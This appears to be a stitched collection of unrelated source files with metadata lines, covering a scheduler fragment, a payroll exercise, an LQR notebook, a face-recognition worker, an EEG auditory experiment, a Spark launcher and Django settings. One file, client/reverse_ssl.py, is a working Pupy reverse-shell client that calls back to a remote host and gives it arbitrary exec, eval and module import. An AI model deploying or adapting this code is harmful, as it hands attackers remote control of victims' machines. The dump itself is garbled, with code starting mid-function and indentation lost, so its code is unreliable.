            # todo: decisions are only made after a certain number of logged rounds
log_repeat += 1
if log_repeat > 0 and (is_replan or (not second_schedule_finished)):
second_schedule_finished = True
# with open("../../logged_times", "wb") as f1:
# pickle.dump(logged_times, f1)
for node_message in message_graph:
time_new = node_message[1] * alpha + logged_times[job_id_in][node_message[0]][0] * (1 - alpha)
logged_times[job_id_in][node_message[0]] = [time_new]
release_order, swap_order, recomputation_order = generate_scheduling_plan(logged_times, 0)
print(logged_times)
control_messages = {}
for i in range(job_num):
print(swap_order)
control_message = [swap_order[i], release_order[i], recomputation_order[i]]
control_messages[map_in_to_out[i]] = control_message
global_control_queue.put(control_messages)
# print(logged_times[0])
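# Offline debug entry point: replay pickled graphs and timing logs through the scheduler without a live executor.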
if debug_mod and __name__ == '__main__':
import pickle
with open('../../global_graphs', 'rb') as f:
g = pickle.load(f)
global_graphs = g
with open('../../logged_times', 'rb') as f:
logged_times = pickle.load(f)
job_num = 1
# profiler = LineProfiler()
# profiler.add_function(get_free_intervals)
# # profiler.add_function(get_occupied_intervals)
# # profiler.add_function(MemoryAnalyzer.get_max_memory_used)
# # profiler.add_function(run_global_memory_analysis)
# profiler_wrapper = profiler(generate_scheduling_plan)
# res = profiler_wrapper(logged_times, 0)
# profiler.print_stats()
release_order, swap_order, recomputation_order = generate_scheduling_plan(logged_times, 0)
| pycode/tinyflow/Scheduler.py | 49,665 | 4,583 | zh | 0.339043
horasextra = int(input("¿Cuantas horas extra has trabajado? "))
horas = horasextra + 35  # the minimum (35 hours)
extra = 0
sueldo = 0
class trabajo:
    def __init__(self, horasextra, horas, extra, sueldo):  # define the constructor
self.horasextra = horasextra
self.horas = horas
self.extra = extra
self.sueldo = sueldo
def horas_totales(self):
if 36 < self.horas < 43:
self.extra = float(self.horas*17) * 1.25
self.sueldo = (35 * 17) + self.extra
print("Ha trabajado: ",horasextra,"horas extra y su sueldo es: ",self.sueldo, "€ ya que ha trabajado en total: ",self.horas,"horas")
if self.horas >= 44:
self.extra = float(self.horas*17) * 1.50
self.sueldo = (35*17) + self.extra
print("Ha trabajado: ",horasextra,"horas extra y su sueldo es: ",self.sueldo,"€ ya que ha trabajado en total: ",self.horas,"horas")
resultado = trabajo(horasextra, horas, extra, sueldo)
print(resultado.horas_totales()) | ej11.py | 1,042 | 29 | es | 0.545406
#!/usr/bin/env python
# -*- coding: UTF8 -*-
import site
import sys
import time
import rpyc
from rpyc.core.service import Service, ModuleNamespace
from rpyc.lib.compat import execute, is_py3k
import threading
import weakref
import traceback
import os
import subprocess
import multiprocessing
import logging
import StringIO
import json
import urllib2
import urllib
import platform
import re
import ssl
import random
import imp
class ReverseSlaveService(Service):
""" Pupy reverse shell rpyc service """
__slots__=["exposed_namespace"]
def on_connect(self):
self.exposed_namespace = {}
self._conn._config.update(dict(
allow_all_attrs = True,
allow_public_attrs = True,
allow_pickle = True,
allow_getattr = True,
allow_setattr = True,
allow_delattr = True,
import_custom_exceptions = False,
propagate_SystemExit_locally=False,
propagate_KeyboardInterrupt_locally=True,
instantiate_custom_exceptions = True,
instantiate_oldstyle_exceptions = True,
))
# shortcuts
self._conn.root.set_modules(ModuleNamespace(self.exposed_getmodule))
def exposed_exit(self):
raise KeyboardInterrupt
def exposed_execute(self, text):
"""execute arbitrary code (using ``exec``)"""
execute(text, self.exposed_namespace)
def exposed_eval(self, text):
"""evaluate arbitrary code (using ``eval``)"""
return eval(text, self.exposed_namespace)
def exposed_getmodule(self, name):
"""imports an arbitrary module"""
return __import__(name, None, None, "*")
def exposed_getconn(self):
"""returns the local connection instance to the other side"""
return self._conn
def get_next_wait(attempt):
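    # back off between reconnect attempts: retry quickly for the first 60 attempts, then wait a random 15-30 s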
if attempt<60:
return 0.5
else:
return random.randint(15,30)
def add_pseudo_pupy_module(HOST):
if not "pupy" in sys.modules:
mod = imp.new_module("pupy")
mod.__name__="pupy"
mod.__file__="<memimport>\\\\pupy"
mod.__package__="pupy"
sys.modules["pupy"]=mod
mod.get_connect_back_host=(lambda : HOST)
mod.pseudo=True
def main():
HOST="127.0.0.1:443"
if "windows" in platform.system().lower():
try:
import pupy
HOST=pupy.get_connect_back_host()
except ImportError:
print "Warning : ImportError: pupy builtin module not found ! please start pupy from either it's exe stub or it's reflective DLL"
else:
if len(sys.argv)!=2:
exit("usage: %s host:port"%sys.argv[0])
HOST=sys.argv[1]
add_pseudo_pupy_module(HOST)
attempt=0
while True:
try:
rhost,rport=None,None
tab=HOST.rsplit(":",1)
rhost=tab[0]
if len(tab)==2:
rport=int(tab[1])
else:
rport=443
print "connecting to %s:%s"%(rhost,rport)
conn=rpyc.ssl_connect(rhost, rport, service = ReverseSlaveService)
while True:
attempt=0
conn.serve()
except KeyboardInterrupt:
print "keyboard interrupt received !"
break
except Exception as e:
time.sleep(get_next_wait(attempt))
attempt+=1
if __name__=="__main__":
main()
| client/reverse_ssl.py | 2,925 | 51 | en | 0.110115
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.4'
# jupytext_version: 1.2.1
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import sys
print(sys.path)
sys.path.append("../lqr")
from lqr_recursion import LqrRecursion
import chainer
import numpy as np
import matplotlib.pyplot as plt
T = 51
f = None
n_state = 3
n_ctrl = 1
n_sc = n_ctrl + n_state
F =chainer.Variable(np.array([(np.array([[
1.0,0, 0, 1],
[1,1.0,0,0],
[0, 1, 1, 0]])) for i in range(T)])).reshape(T,1,n_state,n_sc,)
c = chainer.Variable(np.array([(np.array([0,0,0.0,0]).T) for i in range(T)])).reshape(T,1,n_sc,)
_C = np.array([np.array([[0,0 ,0,0],[0,0,0,0],[0,0,1.0,0],[0,0,0,1]]) for i in range(T-1)])
_C = np.append(_C , np.array([[0,0 ,0,0],[0,0,0,0],[0,0,1.0,0],[0,0,0,0.00000000000001]]))
C = chainer.Variable(_C).reshape(T,1,n_sc, n_sc)
x_init = chainer.Variable(np.array([0.5428, 0.7633,0.3504])).reshape(1,n_state)
C
test = LqrRecursion(x_init,C,c,F,f,T,n_state,n_ctrl)
Ks, ks = test.backward()
k1 =[]
k2 = []
fig, ax = plt.subplots()
for i in range(T-1):
k1.append(Ks[i][0][0][0].data)
k2.append(Ks[i][0][0][1].data)
major_ticks = np.arange(0,T, 2)
ax.grid(which = "major", axis = "x", color = "blue", alpha = 0.8,
linestyle = "--", linewidth = 1)
ax.grid(which = "major", axis = "y", color = "green", alpha = 0.8,
linestyle = "--", linewidth = 1)
ax.set_xticks(major_ticks)
ax.set_ylim(-0.5, 1.2)
ax.plot(k1)
ax.plot(k2)
ax.set_ylim(-2, 0)
ax.set_xlim(0,T)
x,u = test.solve_recursion()
# +
us = []
for i in range(T):
us.append(x[i][0][0].data)
fig, ax = plt.subplots()
ax.grid(which = "major", axis = "x", color = "blue", alpha = 0.8,
linestyle = "--", linewidth = 1)
# set grid lines on the y-axis
ax.grid(which = "major", axis = "y", color = "green", alpha = 0.8,
linestyle = "--", linewidth = 1)
major_ticks = np.arange(0, 20, 2)
ax.set_xticks(major_ticks)
ax.set_ylim(-2, 1)
ax.set_xlim(0, 20)
ax.plot(us, marker='.')
plt.show()
# -
Ks
Ks
len(Ks)
x
| examples/Boyd_lqr.py | 2,276 | 273 | en | 0.456729
'''
Created on August 18th 2020
@author: Nisha Srinivas
'''
import faro
import os
import faro.proto.proto_types as pt
import faro.proto.face_service_pb2 as fsd
import numpy as np
import pyvision as pv
import time
from PIL import Image
import json
import faro.proto.geometry_pb2 as geo
from array import array
roc = None
def getOptionsGroup(parser):
rankone_options = parser.add_option_group("Options for RankOne")
rankone_options.add_option("--img-quality", type=float, dest="img_quality",default=None)
rankone_options.add_option("--num-faces", type=int, dest="num_faces", default=None)
rankone_options.add_option("--min-face-size", dest="min_face_size", default='recommended')
class RankOneFaceWorker(faro.FaceWorker):
    '''
    FaceWorker implementation backed by the Rank One (ROC) face recognition SDK.
    '''
def __init__(self, options):
'''
Constructor
'''
'''
Initialize ROC SDK. looks for the license file and optionally we can provide a log file. If it cannot find the license then it will quit. Roc_ensure catches the error and aborts.
'''
global roc
import roc as _local_roc
roc = _local_roc
if os.environ.get('ROC_LIC') is not None:
roc.roc_ensure(roc.roc_initialize(None,None))
else:
self.license_file = (roc.__file__).split('python')[0] + 'ROC.lic'
roc.roc_ensure(roc.roc_initialize(self.license_file.encode('utf-8'),None))
print("ROC SDK Initialized")
self.img_quality = options.img_quality
self.num_faces = options.num_faces
self.min_face_size = options.min_face_size
self.detection_threshold = self.recommendedDetectionThreshold()
if self.img_quality is None:
self.img_quality = self.recommendedImgQuality()
if self.num_faces is None:
self.num_faces = self.recommendedMaxFacesDetected()
'''
ROC_Frontal : ROC frontal face detector (-30 to +30 degress yaw)
ROC_FR : Represent in-the-wild-faces for comparison
Note : Non-frontal faces detected by ROC_FULL and ROC_PARTIAL are not reliable for recognition.
Therefore we advise against using ROC_FULL or ROC_PARTIAL in conjunction with ROC_FR or ROC_ID.
ROC_FULL : ROC face detector (-100 to +100 degrees yaw)
ROC_DEMOGRAPHICS - Return age, gender, sex
ROC_PITCHYAW - Returns yaw and pitch
'''
self.algorithm_id_detect = roc.ROC_FULL
self.algorithm_id_extract = roc.ROC_MANUAL | roc.ROC_FR | roc.ROC_DEMOGRAPHICS | roc.ROC_LANDMARKS | roc.ROC_PITCHYAW
roc.roc_ensure(roc.roc_preload(self.algorithm_id_detect))
roc.roc_ensure(roc.roc_preload(self.algorithm_id_extract))
def _converttoRocImage(self,imgarray):
#convert to PIL image (This has to be an RGB image)
image_pillow = Image.fromarray(imgarray)
#conver PIL to roc image
image_roc = roc.roc_image()
image_roc.width = image_pillow.width
image_roc.height = image_pillow.height
image_roc.step = 3 * image_pillow.width
image_roc.color_space = roc.ROC_BGR24
bytes = 3 * image_pillow.width * image_pillow.height
image_roc.data = roc.new_uint8_t_array(bytes + 1)
roc.memmove(image_roc.data, image_pillow.tobytes())
#RankOne requires a BGR image
roc.roc_ensure(roc.roc_swap_channels(image_roc))
return image_roc
def _rocFlatten(self,tmpl):
'''
Converts roc template to serialized data.
Datatype = bytes
'''
buffer_size = roc.new_size_t()
#calculates the bytes required to a template
roc.roc_flattened_bytes(tmpl, buffer_size)
buffer_size_int = roc.size_t_value(buffer_size)
roc_buffer_src = roc.new_uint8_t_array(buffer_size_int)
roc.roc_flatten(tmpl, roc_buffer_src)
native_buffer = roc.cdata(roc_buffer_src, buffer_size_int)
roc.delete_size_t(buffer_size)
roc.delete_uint8_t_array(roc_buffer_src)
return native_buffer
def _rocUnFlatten(self, buff, template_dst):
'''
Converts serialized data back to roc template.
'''
#template_dst = roc.roc_template()
roc_buffer_dst = roc.new_uint8_t_array(len(buff) + 1)
roc.memmove(roc_buffer_dst, buff)
roc.roc_unflatten(roc_buffer_dst, template_dst)
roc.delete_uint8_t_array(roc_buffer_dst)
return template_dst
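    # Round trip used throughout this worker: buf = self._rocFlatten(tmpl); self._rocUnFlatten(buf, roc.roc_template())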
def _detect(self,im, opts):
        '''
        In RankOne, face detection happens within the roc_represent function;
        there is no explicit face detection step as in dlib.
        We still output the bounding box, though it is not very useful in this case.
        '''
        '''
        RankOne requires the image to be of type roc_image, so we check the image type.
        Here the input is a numpy array (skimage imread); if so, we convert it to a PIL
        image and then to a roc_image. We do this because RankOne provides example code
        for converting a PIL image to a roc_image.
        '''
h,w,_ = im.shape
if isinstance(im,np.ndarray):
im = self._converttoRocImage(im)
        '''
        Indicates the smallest face to detect.
        Face detection size is measured by the width of the face in pixels.
        The default value is 36, which roughly corresponds to 18 pixels between the eyes.
        '''
if self.min_face_size == 'recommended':
self.min_face_size = self.recommendedMinFaceSize()
elif self.min_face_size == 'adaptive_size':
'''
A method for determining the minimum face detection size as a fraction of the image size.
In the interest of efficiency, it is recommended to set a lower bound on the minimum face detection size as a fraction of the image size. Given a relative minimum size of 4% of the image dimensions, and an absolute minimum size of 36 pixels, the adaptive minimum size is: max(max(image.width, image.height) * 0.04, 36).
Example
roc_image image = ...;
size_t adaptive_minimum_size;
roc_adaptive_minimum_size(image, 0.04, 36, &adaptive_minimum_size);
'''
            adaptive_minimum_size = roc.new_size_t()
            roc.roc_ensure(roc.roc_adaptive_minimum_size(im, 0.04, 36, adaptive_minimum_size))
else:
self.min_face_size = int(self.min_face_size)
self.detection_threshold = opts.threshold
if opts.best:
self.num_faces = 1
#create a template array
templates = roc.new_roc_template_array(self.num_faces)
if self.min_face_size != 'adaptive_size':
roc.roc_represent(im, self.algorithm_id_detect, self.min_face_size, self.num_faces, self.detection_threshold, self.img_quality, templates)
else:
            roc.roc_represent(im, self.algorithm_id_detect, roc.size_t_value(adaptive_minimum_size), self.num_faces, self.detection_threshold, self.img_quality, templates)
roc.delete_size_t(adaptive_minimum_size)
        # We don't need to check for best mode here: if a failed detection occurs,
        # create a template by manually specifying the bounding box
        # (fixes the missing-detection case)
curr_template = roc.roc_template_array_getitem(templates, 0)
if (curr_template.algorithm_id == 0 or curr_template.algorithm_id & roc.ROC_INVALID):
curr_template = roc.roc_template_array_getitem(templates, 0)
curr_template.detection.x = int(w * 0.5)
curr_template.detection.y = int(h * 0.5)
curr_template.detection.width = w
curr_template.detection.height = h
roc.roc_template_array_setitem(templates,0,curr_template)
roc.roc_represent(im, roc.ROC_MANUAL, self.min_face_size, 1, self.detection_threshold, self.img_quality, templates)
roc.roc_free_image(im)
return templates
def detect(self,img,face_records,options):
detected_templates = self._detect(img,options)
for i in range(0,self.num_faces):
curr_template = roc.roc_template_array_getitem(detected_templates, i)
if curr_template.algorithm_id & roc.ROC_INVALID or curr_template.algorithm_id == 0:
continue
else:
face_record = face_records.face_records.add()
face_record.detection.score = curr_template.detection.confidence
xc, yc, w, h = curr_template.detection.x, curr_template.detection.y, curr_template.detection.width, curr_template.detection.height
x = int(xc - (w*0.5))
                y = int(yc - (h*0.5))
face_record.detection.location.CopyFrom(pt.rect_val2proto(x, y, w, h))
face_record.detection.detection_id = i
face_record.detection.detection_class = "FACE"
face_record.template.buffer = self._rocFlatten(curr_template)
#Free all the roc stuff
for i in range(0,self.num_faces):
roc.roc_free_template(roc.roc_template_array_getitem(detected_templates,i))
def extract(self, img, face_records):
if isinstance(img,np.ndarray):
im = self._converttoRocImage(img)
for face_record in face_records.face_records:
template_dst = roc.roc_template()
self._rocUnFlatten(face_record.template.buffer, template_dst)
roc.roc_represent(im, self.algorithm_id_extract, self.recommendedMinFaceSize(), 1, self.recommendedDetectionThreshold(), self.recommendedImgQuality(), template_dst)
if template_dst.algorithm_id & roc.ROC_INVALID or template_dst.algorithm_id == 0:
continue
else:
                xc, yc, w, h = template_dst.detection.x, template_dst.detection.y, template_dst.detection.width, template_dst.detection.height
                x = int(xc - (w*0.5))
                y = int(yc - (h*0.5))
                assert (face_record.detection.location.x == x), "x must match the detection recorded during detect()"
                assert (face_record.detection.location.y == y), "y must match the detection recorded during detect()"
                assert (face_record.detection.location.width == w), "width must match the detection recorded during detect()"
                assert (face_record.detection.location.height == h), "height must match the detection recorded during detect()"
                '''
                Default metadata fields: ChinX, ChinY, IOD (inter-ocular distance), LeftEyeX, LeftEyeY,
                NoseRootX, NoseRootY, Path, Pose, Quality, RightEyeX, RightEyeY, Roll
                '''
metadata_info = json.loads(template_dst.md.decode('utf-8'))
landmark = face_record.landmarks.add()
landmark.landmark_id = 'Nose'
landmark.location.x = metadata_info['NoseRootX']
landmark.location.y = metadata_info['NoseRootY']
landmark = face_record.landmarks.add()
landmark.landmark_id = 'LeftEye'
landmark.location.x = metadata_info['LeftEyeX']
landmark.location.y = metadata_info['LeftEyeY']
landmark = face_record.landmarks.add()
landmark.landmark_id = 'RightEye'
landmark.location.x = metadata_info['RightEyeX']
landmark.location.y = metadata_info['RightEyeY']
landmark = face_record.landmarks.add()
landmark.landmark_id = 'ChinX'
landmark.location.x = metadata_info['ChinX']
landmark.location.y = metadata_info['ChinY']
demographic = face_record.attributes.add()
demographic.key = 'Age'
demographic.text = str(metadata_info['Age'])
demographic = face_record.attributes.add()
demographic.key = 'Gender'
demographic.text = metadata_info['Gender']
demographic = face_record.attributes.add()
demographic.key = 'GeographicOrigin'
demographic.text = metadata_info['GeographicOrigin']
demographic = face_record.attributes.add()
demographic.key = 'Emotion'
demographic.text = metadata_info['Emotion']
demographic = face_record.attributes.add()
demographic.key = 'Artwork'
demographic.text = metadata_info['Artwork']
demographic = face_record.attributes.add()
demographic.key = 'Yaw'
demographic.text = str(metadata_info['Yaw'])
face_record.template.buffer = self._rocFlatten(template_dst)
roc.roc_ensure(roc.roc_free_template(template_dst))
def locate(self,img,face_records,options):
        '''
        Not needed: the eye, nose and chin locations are found during detection and
        are already added to the face records there.
        '''
pass
def align(self,image,face_records):
'''Align the images to a standard size and orientation to allow
recognition.'''
pass # Not needed for this algorithm.
def scoreType(self):
'''Return the method used to create a score from the template.
By default server computation is required.
SCORE_L1, SCORE_L2, SCORE_DOT, SCORE_SERVER
'''
return fsd.SERVER
def score(self,score_request):
'''Compare templates to produce scores.'''
score_type = self.scoreType()
result = geo.Matrix()
# Check that this is a known score type
if score_type not in [fsd.SERVER]:
raise NotImplementedError("Score type <%s> not implemented."%(score_type,))
# Check to make sure the probe and gallery records are correct
if len(score_request.template_probes.templates) == 0:
raise ValueError("no probe templates were found in the arguments.")
if len(score_request.template_gallery.templates) == 0:
raise ValueError("no gallery templates were found in the arguments.")
        # THIS IS NOT NECESSARY AS WE ARE ALWAYS COPYING THE TEMPLATES AND NOT USING FACE RECORD -> REFER TO
        # THE FUNCTION in FaceClient.py
'''
if min(len(score_request.face_probes.face_records),len(score_request.template_probes.templates)) != 0:
raise ValueError("probes argument cannot have both face_probes and template_probes defined.")
if max(len(score_request.face_probes.face_records),len(score_request.template_probes.templates)) == 0:
raise ValueError("no probe templates were found in the arguments.")
if min(len(score_request.face_gallery.face_records),len(score_request.template_gallery.templates)) != 0:
raise ValueError("gallery argument cannot have both face_gallery and template_gallery defined.")
if max(len(score_request.face_gallery.face_records),len(score_request.template_gallery.templates)) == 0:
raise ValueError("no gallery templates were found in the arguments.")
'''
        # This is a first attempt at computing similarity scores and is definitely not the fastest approach.
        # It is also memory-bound: the whole similarity matrix must be held in memory,
        # so this might pose a problem for large datasets.
if score_type == fsd.SERVER:
#rows = probe images
#cols = gallery images
sim_mat = np.zeros((len(score_request.template_probes.templates),len(score_request.template_gallery.templates)),dtype=np.float32)
roc_probe_template = roc.roc_template()
roc_gallery_template = roc.roc_template()
#roc_gallery_template_array = roc.new_roc_template_array(len(score_request.template_gallery.templates))
sm_metric = roc.new_roc_similarity()
for p in range(0,len(score_request.template_probes.templates)):
self._rocUnFlatten(score_request.template_probes.templates[p].buffer,roc_probe_template)
#print roc_probe_template
for g in range(0,len(score_request.template_gallery.templates)):
#print(p,g)
#if p == 0:
# roc_gallery_template = roc.roc_template()
# self._rocUnFlatten(score_request.template_gallery.templates[g].buffer,roc_gallery_template)
# roc.roc_template_array_setitem(roc_gallery_template_array,g,roc_gallery_template)
#roc_gallery_template = roc.roc_template()
self._rocUnFlatten(score_request.template_gallery.templates[g].buffer,roc_gallery_template)
#roc.roc_compare_templates(roc_probe_template, roc.roc_template_array_getitem(roc_gallery_template_array,g), sm_metric)
roc.roc_compare_templates(roc_probe_template, roc_gallery_template, sm_metric)
sim_mat[p,g] = roc.roc_similarity_value(sm_metric)
#roc.roc_free_template(roc_gallery_template)
roc.delete_roc_similarity(sm_metric)
roc.roc_free_template(roc_probe_template)
roc.roc_free_template(roc_gallery_template)
#for i in range(len(score_request.template_gallery.templates)):
#print(i)
# roc.roc_ensure(roc.roc_free_template(roc.roc_template_array_getitem(roc_gallery_template_array, i)))
else:
NotImplementedError("ScoreType %s is not implemented."%(score_type,))
        # RankOne returns a similarity score of -1 when it compares against an invalid template,
        # so find all -1's in the matrix and replace them with 0
        sim_mat[sim_mat == -1.0] = 0.0
        # convert the similarity matrix to a distance matrix by subtracting it from 1
dist_mat = 1.0 - sim_mat
# Return the result
return pt.matrix_np2proto(dist_mat)
def status(self):
'''Return a simple status message.'''
print("Handeling status request.")
status_message = fsd.FaceServiceInfo()
status_message.status = fsd.READY
status_message.detection_support = True
status_message.extract_support = True
status_message.score_support = False
status_message.score_type = self.scoreType()
status_message.algorithm = "RankOne_%s"%(roc.__file__);
status_message.detection_threshold = self.recommendedDetectionThreshold()
status_message.match_threshold = self.recommendedScoreThreshold()
return status_message
def recommendedImgQuality(self):
return roc.ROC_SUGGESTED_MIN_QUALITY
def recommendedDetectionThreshold(self):
'''
The false_detection_rate parameter specifies the allowable
false positive rate for face detection.The suggested default
value for false_detection_rate is 0.02 which corresponds to
one false detection in 50 images on the FDDB benchmark. A
higher false detection rate will correctly detect more faces
at the cost of also incorrectly detecting more non-faces.
The accepted range of values for false_detection_rate is
between 0 to 1. Values outside this range will be modified
to be at the aforementioned bounds automatically.
'''
return 0.02
def recommendedMaxFacesDetected(self):
return 10
def recommendedMinFaceSize(self):
return 32
def recommendedScoreThreshold(self,far=-1):
        '''Return a recommended score threshold.
        DLIB recommends a value of 0.6 for the LFW dataset.
        '''
return 0.60
def cleanexit(self):
print('ROC SDK Deinitialized')
roc.roc_finalize()
| src/faro/face_workers/RankOneFaceWorker.py | 20,517 | 3,456 | en | 0.663953
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from locales import Locales
print("content-type:text/html\n\n")
locales_obj = Locales('en')
print(locales_obj.get_missing_translations())
| get_missing_translations.py | 188 | 43 | fr | 0.304089
"""
Generate Steady-State Auditory Evoked Potential (SSAEP)
=======================================================
Steady-State Auditory Evoked Potential (SSAEP) - also known as Auditory
Steady-State Response (ASSR) - stimulus presentation.
"""
from time import time
import numpy as np
from pandas import DataFrame
from psychopy import visual, core, event, sound
from scipy import stats
__title__ = "Auditory SSAEP (orig)"
def present(
save_fn: str,
duration=120,
n_trials=2010,
iti=0.5,
soa=3.0,
jitter=0.2,
volume=0.8,
random_state=42,
eeg=None,
cf1=900,
amf1=45,
cf2=770,
amf2=40.018,
sample_rate=44100,
):
"""
Auditory SSAEP Experiment
===========================
Parameters:
-----------
duration - duration of the recording in seconds (default 10)
n_trials - number of trials (default 10)
iti - intertrial interval (default 0.3)
soa - stimulus onset asynchrony, = interval between end of stimulus
and next trial (default 0.2)
jitter - jitter in the intertrial intervals (default 0.2)
secs - duration of the sound in seconds (default 0.2)
volume - volume of the sounds in [0,1] (default 0.8)
random_state - random seed (default 42)
"""
# Set up trial parameters
np.random.seed(random_state)
markernames = [1, 2]
record_duration = np.float32(duration)
# Initialize stimuli
am1 = generate_am_waveform(cf1, amf1, secs=soa, sample_rate=sample_rate)
am2 = generate_am_waveform(cf2, amf2, secs=soa, sample_rate=sample_rate)
aud1 = sound.Sound(am1, sampleRate=sample_rate)
aud1.setVolume(volume)
aud2 = sound.Sound(am2, sampleRate=sample_rate)
aud2.setVolume(volume)
auds = [aud1, aud2]
# Set up trial list
stim_freq = np.random.binomial(1, 0.5, n_trials)
itis = iti + np.random.rand(n_trials) * jitter
trials = DataFrame(dict(stim_freq=stim_freq, timestamp=np.zeros(n_trials)))
trials["iti"] = itis
trials["soa"] = soa
# Setup graphics
mywin = visual.Window(
[1920, 1080], monitor="testMonitor", units="deg", fullscr=True
)
fixation = visual.GratingStim(win=mywin, size=0.2, pos=[0, 0], sf=0, rgb=[1, 0, 0])
fixation.setAutoDraw(True)
mywin.flip()
# Show the instructions screen
show_instructions(10)
# Start EEG Stream, wait for signal to settle, and then pull timestamp for start point
if eeg:
eeg.start(save_fn, duration=record_duration)
start = time()
# Iterate through the events
for ii, trial in trials.iterrows():
# Intertrial interval
core.wait(trial["iti"] + np.random.randn() * jitter)
# Select stimulus frequency
ind = trials["stim_freq"].iloc[ii]
auds[ind].stop()
auds[ind].play()
# Push sample
if eeg:
timestamp = time()
if eeg.backend == "muselsl":
marker = [markernames[ind]]
marker = list(map(int, marker))
else:
marker = markernames[ind]
eeg.push_sample(marker=marker, timestamp=timestamp)
mywin.flip()
# Offset
core.wait(soa)
if len(event.getKeys()) > 0:
break
if (time() - start) > record_duration:
break
event.clearEvents()
# Cleanup
if eeg:
eeg.stop()
mywin.close()
def show_instructions(duration):
instruction_text = """
    Welcome to the SSAEP experiment!
Stay still, focus on the centre of the screen, and try not to blink.
This block will run for %s seconds.
Press spacebar to continue.
"""
instruction_text = instruction_text % duration
# graphics
mywin = visual.Window([1600, 900], monitor="testMonitor", units="deg", fullscr=True)
mywin.mouseVisible = False
# Instructions
text = visual.TextStim(win=mywin, text=instruction_text, color=[-1, -1, -1])
text.draw()
mywin.flip()
event.waitKeys(keyList="space")
mywin.mouseVisible = True
mywin.close()
def generate_am_waveform(
carrier_freq,
am_freq,
secs=1,
sample_rate=None,
am_type="gaussian",
gaussian_std_ratio=8,
):
"""Generate an amplitude-modulated waveform.
Generate a sine wave amplitude-modulated by a second sine wave or a
Gaussian envelope with standard deviation = period_AM/8.
Args:
carrier_freq (float): carrier wave frequency, in Hz
am_freq (float): amplitude modulation frequency, in Hz
Keyword Args:
secs (float): duration of the stimulus, in seconds
sample_rate (float): sampling rate of the sound, in Hz
am_type (str): amplitude-modulation type
'gaussian' -> Gaussian with std defined by `gaussian_std`
'sine' -> sine wave
gaussian_std_ratio (float): only used if `am_type` is 'gaussian'.
Ratio between AM period and std of the Gaussian envelope. E.g.,
gaussian_std = 8 means the Gaussian window has 8 standard
deviations around its mean inside one AM period.
Returns:
(numpy.ndarray): sound samples
"""
t = np.arange(0, secs, 1.0 / sample_rate)
if am_type == "gaussian":
period = int(sample_rate / am_freq)
std = period / gaussian_std_ratio
norm_window = stats.norm.pdf(np.arange(period), period / 2, std)
norm_window /= np.max(norm_window)
n_windows = int(np.ceil(secs * am_freq))
am = np.tile(norm_window, n_windows)
am = am[: len(t)]
elif am_type == "sine":
am = np.sin(2 * np.pi * am_freq * t)
carrier = 0.5 * np.sin(2 * np.pi * carrier_freq * t) + 0.5
am_out = carrier * am
return am_out
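# Example usage (values mirror the cf1/amf1 defaults that present() passes in above):
# am1 = generate_am_waveform(900, 45, secs=3.0, sample_rate=44100)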
| eegnb/experiments/auditory_ssaep/ssaep.py | 5,781 | 1,958 | en | 0.712026
import os
import sys
import argparse
from importlib import import_module
from pyspark.sql import SparkSession
spark = SparkSession.builder.getOrCreate()
# Load configuration
parser = argparse.ArgumentParser()
parser.add_argument("job", type=str, nargs='?', default="Job1.MyMethod")
parser.add_argument("slot", type=str, nargs='?', default="2018/11/19")
args = parser.parse_args()
job_module, job_method = args.job.rsplit('.',1)
slot = args.slot
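# Example invocation (assumed): spark-submit main.py Job1.MyMethod 2018/11/19; both arguments are optional and default to the values above.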
if "local" in spark.sparkContext.master:
dirname = os.path.dirname(__file__)
sys.path.insert(0, (os.path.join(dirname, 'Utils')))
sys.path.insert(0, (os.path.join(dirname, 'Jobs')))
spark.conf.set("ADLS",os.path.join(dirname, 'DataLake'))
else:
spark.sparkContext.addPyFile("dbfs:/MyApplication/Code/scripts.zip")
spark.conf.set("ADLS",'adl://myazuredatalake.azuredatalakestore.net/')
spark.conf.set("dfs.adls.oauth2.access.token.provider.type", "ClientCredential")
spark.conf.set("dfs.adls.oauth2.client.id", dbutils.secrets.get(scope = "SparkADLS - Secrets", key = "clientid"))
spark.conf.set("dfs.adls.oauth2.credential", dbutils.secrets.get(scope = "SparkADLS - Secrets", key = "credential"))
spark.conf.set("dfs.adls.oauth2.refresh.url", "https://login.microsoftonline.com/[tenantid]/oauth2/token")
# Execute Job
mod = import_module(job_module)
met = getattr(mod, job_method)
met(slot) | main.py | 1,382 | 30 | en | 0.665473
import os
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
SECRET_KEY = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
DEBUG = True
USE_TZ = False
INSTALLED_APPS = [
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
]
MIDDLEWARE = [
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
]
# ROOT_URLCONF = "tests.urls"
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
],
},
},
]
DATABASES = {
"default": {
"ENGINE": "django.db.backends.sqlite3",
"NAME": os.path.join(BASE_DIR, "db.sqlite3"),
}
}
STATIC_URL = "/static/"
| tests/settings.py | 1,316 | 27 | en | 0.485173
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Created by TaoYuan on 2018/2/28 0028.
# @Link : http://blog.csdn.net/lftaoyuan
# Github : https://github.com/seeways
import asyncio
import orm
from models import User, Blog, Comment
@asyncio.coroutine
def test(loop):
yield from orm.create_pool(loop=loop, user='root', password='123456', database='awesome')
# taoyuan 123456
u = User(name='TaoYuan', email='taoyuan', passwd='396d447288c288f0ff7ba1fc608600d7e233646d', image='about:blank')
yield from u.save()
loop = asyncio.get_event_loop()
loop.run_until_complete(test(loop))
loop.close()
| www/test_sql.py | 615 | 178 | en | 0.448002
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2020 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
